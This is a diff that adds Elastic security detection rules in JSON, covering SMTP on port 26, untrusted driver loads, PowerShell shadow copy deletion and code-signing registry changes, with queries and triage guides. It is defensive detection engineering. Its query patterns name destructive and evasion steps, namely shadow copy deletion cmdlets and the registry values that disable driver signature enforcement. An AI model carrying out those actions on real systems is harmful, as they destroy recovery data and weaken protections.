+ "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d76b02ef-fc95-4001-9297-01cb7412232f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.006", + "name": "Python", + "reference": "https://attack.mitre.org/techniques/T1059/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "d76b02ef-fc95-4001-9297-01cb7412232f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_104.json b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_104.json new file mode 100644 index 00000000000..ae67631554b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_104.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects events that may indicate use of SMTP on TCP port 26. This port is commonly used by several popular mail transfer agents to deconflict with the default SMTP port 25. This port has also been used by a malware family called BadPatch for command and control of Windows systems.", + "false_positives": [ + "Servers that process email traffic may cause false positives and should be excluded from this rule as this is expected behavior." + ], + "from": "now-9m", + "index": [ + "packetbeat-*", + "auditbeat-*", + "filebeat-*", + "logs-network_traffic.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SMTP on Port 26/TCP", + "query": "(event.dataset: (network_traffic.flow or zeek.smtp) or event.category:(network or network_traffic)) and network.transport:tcp and destination.port:26\n", + "references": [ + "https://unit42.paloaltonetworks.com/unit42-badpatch/", + "https://isc.sans.edu/forums/diary/Next+up+whats+up+with+TCP+port+26/25564/" + ], + "related_integrations": [ + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d7e62693-aab9-4f66-a21a-3d79ecdd603d", + "severity": "low", + "tags": [ + "Tactic: Command and Control", + "Domain: Endpoint", + "Use Case: Threat Detection" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 104 + }, + "id": "d7e62693-aab9-4f66-a21a-3d79ecdd603d_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_7.json b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_7.json new file mode 100644 index 00000000000..9b33869d609 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_7.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempt to load an untrusted driver. Adversaries may modify code signing policies to enable execution of unsigned or self-signed code.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Untrusted Driver Loaded", + "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "driver where host.os.type == \"windows\" and process.pid == 4 and\n dll.code_signature.trusted != true and \n not dll.code_signature.status : (\"errorExpired\", \"errorRevoked\")\n", + "references": [ + "https://github.com/hfiref0x/TDL", + "https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "d8ab1ec1-feeb-48b9-89e7-c12e189448aa", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "d8ab1ec1-feeb-48b9-89e7-c12e189448aa_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_110.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_110.json new file mode 100644 index 00000000000..fa6809bf7a7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_110.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Volume Shadow Copy Deletion via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via PowerShell\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring.\n\nThis rule monitors the execution of PowerShell cmdlets to interact with the Win32_ShadowCopy WMI class, retrieve shadow copy objects, and delete them.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n process.args : (\"*Get-WmiObject*\", \"*gwmi*\", \"*Get-CimInstance*\", \"*gcim*\") and\n process.args : (\"*Win32_ShadowCopy*\") and\n process.args : (\"*.Delete()*\", \"*Remove-WmiObject*\", \"*rwmi*\", \"*Remove-CimInstance*\", \"*rcim*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/vsswmi/win32-shadowcopy", + "https://powershell.one/wmi/root/cimv2/win32_shadowcopy", + "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "d99a037b-c8e2-47a5-97b9-170d076827c4_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_111.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_111.json new file mode 100644 index 00000000000..c0201aecbc2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_111.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Volume Shadow Copy Deletion via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via PowerShell\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring.\n\nThis rule monitors the execution of PowerShell cmdlets to interact with the Win32_ShadowCopy WMI class, retrieve shadow copy objects, and delete them.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n process.args : (\"*Get-WmiObject*\", \"*gwmi*\", \"*Get-CimInstance*\", \"*gcim*\") and\n process.args : (\"*Win32_ShadowCopy*\") and\n process.args : (\"*.Delete()*\", \"*Remove-WmiObject*\", \"*rwmi*\", \"*Remove-CimInstance*\", \"*rcim*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/vsswmi/win32-shadowcopy", + "https://powershell.one/wmi/root/cimv2/win32_shadowcopy", + "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "d99a037b-c8e2-47a5-97b9-170d076827c4_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_8.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_8.json new file mode 100644 index 00000000000..0f41b64286b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_8.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to disable the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Code Signing Policy Modification Through Registry", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : (\n \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\",\n \"HKU\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\"\n ) and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } 